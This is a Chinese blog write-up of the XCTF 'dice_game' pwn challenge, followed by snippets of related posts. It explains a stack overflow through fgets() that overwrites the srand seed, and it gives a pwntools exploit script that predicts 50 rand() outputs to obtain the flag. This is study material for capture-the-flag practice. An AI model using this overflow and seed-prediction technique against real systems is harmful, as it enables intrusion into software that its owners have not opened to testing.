dice_game(xctf)

最新推荐文章于 2023-01-26 10:32:53 发布
最新推荐文章于 2023-01-26 10:32:53 发布
阅读量915 收藏
点赞数 1
分类专栏: # xctf(pwn高手区) CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43868725/article/details/106321685
版权

0x0 程序保护和流程

保护:

在这里插入图片描述

流程:

main()

在这里插入图片描述

sub_A20()

在这里插入图片描述

sub_B28()

在这里插入图片描述

只要sub_A20()的验证通过50次就可以通过sub_B20()输出flag。而sub_A20()通过随机数来决定返回的值是否为1。整个程序只有fgets()处可以覆盖栈上其他变量的值,所以可以通过fgets()修改seed[0]的值。

0x1 利用过程

可以观察到seed[0]处于rsp+40h的位置所以padding=‘a’*40之后就可以覆盖seed[0]的值了。

0x2 exp

from pwn import *
from ctypes import *
libc=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
libc.srand(1)
sh=process('./a')
# sh=remote('124.126.19.106','30741')
payload='a'*0x40+p64(1)
sh.recvuntil('Welcome, let me know your name: ')
sh.sendline(payload)
for i in range(50):
    sh.recvuntil('Give me the point(1~6): ')
    sh.sendline(str(libc.rand()%6+1))

sh.recv()
dice_game [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列12
重新启程
12-23 1914
题目地址:dice_game 从这篇开始就正式进入高手进阶区,一些简单的知识点我这里就不会再重复赘述了,请有需要的同学看前面的章节。 废话不多,看看题目 题目没什么提示,只是知道这个题目的来源是:XCTF 4th-QCTF-2018 下载附件,看看情况,照例做下保护机制检查 root@mypwn:/ctf/work/python/dice_game# checksec dice_g...
dice_game攻防世界进阶区
shanwei274的博客
04-10 1860
dice_game XCTF 4th-QCTF-2018 前言,不得不说,虽然是个简单题但是还是要记录一下,来让自己记住这些东西。 考察的知识点是: 1.cdll_loadlibrary加载对应库使得Python可以使用c的函数。 2.关于srand函数中种子的介绍。 3.一些平时没有见过的杂项 保证我写的很详细,因为我也是个菜鸡 ----第一步查看保护喽 第一眼就很恐怖嗷,居然就只有canary没有开,其他的全开,got表也不能修改,我就很痛苦嗷 ----第二步ida看看 main函数这里要说的呢 1
diceGame
02-17
diceGame
xctf dice_game
Tw0的博客
10-14 156
rand()函数是使用线性同余法做的,它并不是真的随机数,因为其周期特别长,所以在一定范围内可以看成随机的。 srand()为初始化随机数发生器,用于设置rand()产生随机数时的种子。传入的参数seed为unsigned int类型,通常我们会使用time(0)或time(NULL)的返回值作为seed。 任何在调用rand函数前如果没有设置过srand函数的种子,那么系统会自动设置srand(1)为种子。 总结: 1、import ctypes函数库,选择相应版本的libc动态链接库,(..
XCTF dice_game [Writeup]
柷敔的博客
01-26 227
非常简单的一道缓冲溢出pwn题,顺便结合了下python调用libc函数与srand设置初始化种子的知识点,read函数的bug弄得太明显了。类似的srand漏洞也有一些,比如如果知道使用的是常见的的设置方法、且rand的结果和对应的第几次调用已知的话,可以通过遍历时间的方法确定后续的所有随机结果。
XCTFdice_game write up
4ut15m's blog
10-15 460
未经授权请勿转载,谢谢。 个人博客:http://ank.4ut15m.com/anicekid/20191005/%e3%80%90xctf%e3%80%91dice_game-write-up/ 1.题目 运行如下: 运行结果 可知,这是一个猜测随机数的程序,需要猜中50次。 检查保护如下: 程序保护 除了Canary之外都开了,估计便是栈溢出。 程序信息如下: ...
pwn dice_game
weixin_44319142的博客
05-02 563
dice_game 又是seed from pwn import * from ctypes import * context.log_level='debug' libc = cdll.LoadLibrary("libc.so.6") p = process('./dice_game') #p = remote("111.198.29.45",56813) p.recvuntil(" ...
[XCTF-pwn] 5-dice_game
weixin_52640415的博客
03-03 644
跟pwn都关系不大,连续答对50个随机数即可。 分两步:先按他的种子生成随机数 #include <stdio.h> #include <stdlib.h> int main(){ unsigned int seed; seed = 0x30303030; srand(seed); for(int i=0;i<50;i++)printf("%d\n", rand()); return 0; } 然后用这输入这些随机数就能
dice_game XCTF
最新发布
01-14
### 关于Dice GameXCTF竞赛中的问题材料 #### 题目概述 Dice GameXCTF 竞赛中的一道 PWN 类型题目,该二进制文件具有特定的安全特性配置。通过 `checksec` 工具检测发现此程序启用了完整的RELRO和NX位,但是...
dice_game.zip
06-16
资源为攻防世界上的pwn题目样本,主要就是设计缓冲区溢出,大家也可在攻防世界pwn练习题中获取,地址为https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4694&page=1
dicegame
03-13
:game_die: 骰子游戏 简单的两人骰子游戏。 一旦用户单击“滚动骰子”按钮,骰子就会被随机抛出,因此玩家1和玩家2都有自己的骰子值。 然后,骰子游戏将根据骰子值较高宣布一个获胜者。 部署方式 演示: 建于 HTML CSS JavaScript 作者 Tillaberdiyev Ibrat 致谢 完整的2020 Web开发训练营(作者Angela Yu)
DiceGame
03-21
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: npm start 在开发模式下运行应用程序。打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。您还将在控制台中看到任何棉绒错误。 npm test 在交互式监视模式下启动测试运行器。有关更多信息,请参见关于的部分。 npm run build 构建生产到应用程序build文件夹。它在生产模式下正确捆绑了React,并优化了构建以获得最佳性能。 生成被最小化,并且文件名包括哈希值。您的应用已准备好进行部署! 有关更多信息,请参见关于的部分。 npm run eject 注意:这是单向操作。 eject ,您将无法返回! 如果您对构建工具和配置选择不满意,则可以随时eject 。此命令将从项目中删除单个构建依赖项。 相反,它将所有配置文件和传递依赖项(webpack,Babel,ESLin
DiceGame:骰子游戏
02-20
DiceGame:骰子游戏
DiceGame:这是一个简单的骰子滚动游戏
05-20
骰子游戏 这是一个简单的骰子滚动游戏。
攻防世界 dice_game
qq_25044201的博客
01-19 378
ida分析一下 感觉这个题目似曾相识,翻了翻博客是猜数那道题 这是当时那道题的脚本,但是如果一个个输50个数那么就太麻烦了。所以我们引用新的知识,我们知道现在都是动态链接,好多函数在链接前已经存在,所以在python我们调用动态链接库函数的功能的库是ctypes库,当然 下载的附件有个libs库我们可以调用ctypes的函数cdll的LoadLibrary函数 和猜数几乎一样 所以具体的我就不多说了 ...
DiceGameDice Game,也称为Pig Game
02-28
骰子游戏 骰子游戏,也称为猪游戏 游戏规则: 游戏中有2位玩家,每局比赛。 随机确定第一个参加第一轮比赛的玩家 在每个回合中,玩家掷骰子的次数与他希望的次数相同。 每个结果都会加到他的ROUND分数中 但是,如果玩家掷出1,则他的全部回合得分都将丢失。 在那之后,轮到下一个玩家了 玩家连续两次掷出两个6时,便失去了ENTIRE得分。 之后,该轮到下一个玩家了。 玩家可以选择“保留”,这意味着他的回合得分将被添加到他的总得分中。 在那之后,轮到下一个玩家了 首位达到总积分100(可在选项中更改)的玩家-赢得比赛
DiceGame:一种网页游戏,其中获胜者由2个骰子之间的较高掷骰决定
02-18
骰子游戏 一种网页游戏,其中获胜者由2个骰子之间的较高掷骰决定。 与JavaScript结合使用DOM来处理HTML文档的各个部分,而JavaScript则具有直接计算功能。 Udemy的2021年Web开发新手训练班不错的挑战。
Dice-Game:骰子游戏,第一个得分 100 或更多的人赢得游戏
05-30
骰子游戏 介绍 一个简单的骰子游戏,自己玩或与朋友对战。 玩家轮流滚动单个骰子,只要他们想要添加到运行总数即可。 如果玩家掷出 1,他们将失去他们的总分。当你想要时保持你的分数,当他们达到 100 分时,一个玩家获胜。 单击“新游戏”重置应用程序。 游戏规则 游戏有 2 名玩家,进行回合比赛。 在每一轮中,玩家可以根据自己的意愿掷骰子。 每个结果都会添加到他的 ROUND 分数中。 但是,如果玩家将其中一个骰子掷出 1,则他的所有 ROUND 分数都会丢失。 之后,轮到下一位玩家了 玩家可以选择“保持”,这意味着他的 ROUND 分数会被添加到他的 GLOBAL 分数中。 之后,就轮到下一位玩家了。 第一位在GLOBAL得分上达到100分的玩家将赢得比赛。 分数预定义为 100。 演示 信用 由来自的 Freepik 制作的图标 免费游戏,享受!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值